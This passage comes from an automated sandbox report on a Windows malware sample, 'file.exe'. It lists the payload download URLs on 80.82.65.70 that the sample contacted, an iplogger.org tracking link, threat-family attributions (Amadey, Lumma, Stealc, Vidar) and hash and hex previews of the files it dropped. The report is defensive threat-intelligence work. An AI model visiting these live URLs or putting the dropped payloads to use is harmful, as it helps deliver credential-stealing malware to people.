                http://80.82.65.70/files/downloadAfile.exe, 00000000.00000003.2057643849.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082783354.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2032603186.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://80.82.65.70/soft/downloadi~Nfile.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.2330322141.000000000565E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2327084794.000000000581C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330368931.0000000005601000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328880830.000000000581C000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                  high
                  http://80.82.65.70/add?substr=mixtwo&s=three&sub=empSfile.exe, 00000000.00000002.2611981318.00000000055A0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://iplogger.org/1Pz8p7file.exe, 00000000.00000003.2330322141.000000000565E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2327084794.000000000581C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330368931.0000000005601000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328880830.000000000581C000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                    high
                    http://80.82.65.70/files/downloadFfile.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://80.82.65.70/files/download#file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://80.82.65.70/files/download$file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    80.82.65.70
                    unknownNetherlands
                    202425INT-NETWORKSCfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1574107
                    Start date and time:2024-12-12 23:07:09 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.evad.winEXE@2/15@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.21, 4.175.87.197, 13.107.246.63, 40.126.53.18
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: file.exe
                    TimeTypeDescription
                    17:08:34API Interceptor24350x Sleep call for process: file.exe modified
                    17:09:33API Interceptor1x Sleep call for process: WerFault.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    80.82.65.70file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                    • 80.82.65.70/files/download
                    file.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70/soft/download
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                    • 80.82.65.70/soft/download
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                    • 80.82.65.70/soft/download
                    file.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70/soft/download
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                    • 80.82.65.70/soft/download
                    file.exeGet hashmaliciousSocks5SystemzBrowse
                    • 80.82.65.70/soft/download
                    PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                    • 80.82.65.70/files/download
                    Mk4JWS27SO.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70/soft/download
                    BsVEQQnfyN.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70/soft/download
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    INT-NETWORKSCfile.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                    • 80.82.65.70
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                    • 80.82.65.70
                    file.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                    • 80.82.65.70
                    file.exeGet hashmaliciousSocks5SystemzBrowse
                    • 80.82.65.70
                    PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                    • 80.82.65.70
                    Mk4JWS27SO.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70
                    BsVEQQnfyN.exeGet hashmaliciousUnknownBrowse
                    • 80.82.65.70
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                    • 80.82.65.70
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]file.exeGet hashmaliciousUnknownBrowse
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                        file.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                            file.exeGet hashmaliciousSocks5SystemzBrowse
                              Mk4JWS27SO.exeGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9701287623834172
                                        Encrypted:false
                                        SSDEEP:192:22NE0+vxPiA0u1AXI3jud3szuiFNZ24IO8TVBV:2K4xou1AAj3zuiFNY4IO8X
                                        MD5:7D7E8209FD533394C0B1A29CE6286F82
                                        SHA1:ECB60761C681B008B3479944CC1D6E166DAA8640
                                        SHA-256:69F1EC8671E9EE13D3C62DCFB59FF5651F6250BCD0DBFC59A2096912E31B7DBF
                                        SHA-512:206C1899E67BF3BC17C14C0FFFD3F1508C36782635031924C99D5D9BFBDA5390E39969006C7A3F3748607413E35E1D7A63BFD2E3037C745A38F63854A405FE03
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.1.4.9.4.8.0.1.8.7.5.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.1.4.9.4.8.4.8.7.5.0.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.a.9.c.c.1.a.-.0.d.e.b.-.4.a.f.f.-.9.0.f.7.-.f.b.0.6.9.1.f.7.a.c.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.d.8.5.2.c.8.-.f.1.7.d.-.4.7.8.4.-.a.c.c.e.-.6.2.f.3.8.b.d.f.a.4.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.6.c.-.0.0.0.1.-.0.0.1.4.-.1.c.1.c.-.c.8.5.0.e.2.4.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.1.4.9.7.9.f.a.6.0.7.e.3.8.d.2.7.9.0.5.b.1.f.1.5.1.f.1.c.2.5.8.0.0.0.0.1.5.0.6.!.0.0.0.0.c.9.a.f.a.b.3.e.1.1.7.1.5.3.f.4.6.9.7.2.3.1.0.2.2.1.4.a.9.0.7.6.8.5.a.5.0.9.d.6.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 12 22:09:08 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):46130
                                        Entropy (8bit):2.54394679324337
                                        Encrypted:false
                                        SSDEEP:384:vyOr2kE5jD1vf+QfkHAwxgSA8bwc0a1Lm4U:Ksp0jD1vf+QsHA7SJwzQU
                                        MD5:D2989A3B044E7E0B67A881BD74DF5278
                                        SHA1:2518689C898AAF533F0933359576B972FB5DF8CD
                                        SHA-256:CD2D7072F110986C59729F71A2EE9DDEABBC75B5A22BAF992B4E84C5EB555629
                                        SHA-512:D7633347E5133C96893098E374A448E302DF5E17BE694BE5E082C778CE083E955A48BF108E30EF61B411DCAF768C70785D51AA0C43DF127A3074669B2C7B9D97
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... ........_[g............4...........8...<.......T....,..........T.......8...........T............A...r..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......l....^[g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8298
                                        Entropy (8bit):3.687383642944685
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJPCP6I6Y9sSUhVQgmfBGW6pDH89bfgsfJ11m:R6lXJq6I6YGSUhSgmfZffzfJW
                                        MD5:85310D2851FB04D0BFD79140438968E6
                                        SHA1:3177DBD044DC4FD5C02E3E9247DD985E0C3335EB
                                        SHA-256:67C2165CC0BBF19F1D2DA3DEB055D20815CB4257E61EAFB3F4AAC1E1A9F66DB4
                                        SHA-512:EBE1308551FBD67A4F01A8711D2B8A6233630637C361D58644617B17D1FF3207BF8881D50AD4C699F6AAABEF5526227AB1B8049DDA2E0A647B939F29667D6154
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.0.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4541
                                        Entropy (8bit):4.429487249028923
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsUBJg77aI9ozWpW8VYzYm8M4JBRFK+q82gkg9d+Rd:uIjfUTI7aC7VjJIAVr+Rd
                                        MD5:50C6AD9D20F841F68552D7DF2AD076F7
                                        SHA1:7FB0FE04F5672E0F5FEC58E73573494590B4E4F7
                                        SHA-256:486CCDD0379E990B05E6795B0AC7AE6B8B8EB08E60F4A0CDF661C36895D0347D
                                        SHA-512:FCA7CCA91446DCB562BE8C966EFA43CD5218E05237C81DB8EFAABA6BD37D25E88F3A2815014EAEDF43D0D3201D0D3B9AA964D2F639457FD77D2E59936F8674B2
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="628631" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:V:V
                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:0
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):242176
                                        Entropy (8bit):6.47050397947197
                                        Encrypted:false
                                        SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                        MD5:2ECB51AB00C5F340380ECF849291DBCF
                                        SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                        SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                        SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: Mk4JWS27SO.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Reputation:high, very likely benign file
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:V:V
                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                        Malicious:false
                                        Preview:0
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):97296
                                        Entropy (8bit):7.9982317718947025
                                        Encrypted:true
                                        SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                        MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                        SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                        SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                        SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                        Malicious:false
                                        Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:V:V
                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                        Malicious:false
                                        Preview:0
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):21
                                        Entropy (8bit):3.880179922675737
                                        Encrypted:false
                                        SSDEEP:3:gFsR0GOWW:gyRhI
                                        MD5:408E94319D97609B8E768415873D5A14
                                        SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                        SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                        SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                        Malicious:false
                                        Preview:9tKiK3bsYm4fMuK47Pk3s
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1250000
                                        Entropy (8bit):7.914044333202875
                                        Encrypted:false
                                        SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60:7rPD/8I/8ly+Zrr2h60
                                        MD5:06BCE98464ED237227246A609B8A2A80
                                        SHA1:4A4945FCFCB498D7B8AC9B2CD0EDEB26DFD810E5
                                        SHA-256:50FADCBC24764ECC8BEA076BDD6FD8E3BA32865BCCE3BABD02DF65A7837656D1
                                        SHA-512:34790FFAD56407C220A75A6E54D96A7410745E12507E20729CFB0311B8349501FD57BC0E50ACFA5D884BED0F1CD0A3C096E59F10D93FD4465E0659A17EA8D534
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):242176
                                        Entropy (8bit):6.47050397947197
                                        Encrypted:false
                                        SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                        MD5:2ECB51AB00C5F340380ECF849291DBCF
                                        SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                        SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                        SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
